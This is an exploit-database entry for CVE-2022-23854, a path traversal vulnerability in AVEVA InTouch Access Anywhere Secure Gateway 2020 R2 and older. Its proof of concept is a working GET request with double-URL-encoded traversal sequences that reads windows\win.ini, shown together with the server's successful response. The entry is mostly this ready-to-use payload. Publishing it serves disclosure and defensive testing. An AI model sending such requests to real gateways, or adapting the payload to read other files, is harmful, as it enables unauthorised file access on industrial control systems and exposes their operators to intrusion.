EXPLOITS

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

Author: Jens Regel
type: remote
platform: hardware
port: 
date_added: 2022-11-11  
date_updated: 2022-11-11  
verified: 0  
codes: CVE-2022-23854  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51028.txt  

Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1